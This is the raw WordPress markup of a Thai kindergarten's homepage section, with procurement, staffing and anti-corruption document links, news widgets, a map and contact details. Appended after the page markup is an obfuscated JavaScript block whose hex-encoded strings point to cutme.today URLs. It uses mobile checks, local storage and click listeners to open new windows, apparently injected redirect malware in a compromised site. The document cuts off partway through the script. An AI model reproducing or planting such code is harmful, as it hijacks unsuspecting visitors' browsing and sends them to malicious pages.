900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1s25QprjH5mZ-zGGQHfrL8aL1LztcZZVs/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1s25QprjH5mZ-zGGQHfrL8aL1LztcZZVs/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\" data-type=\"link\" data-id=\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_91838d-0f\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\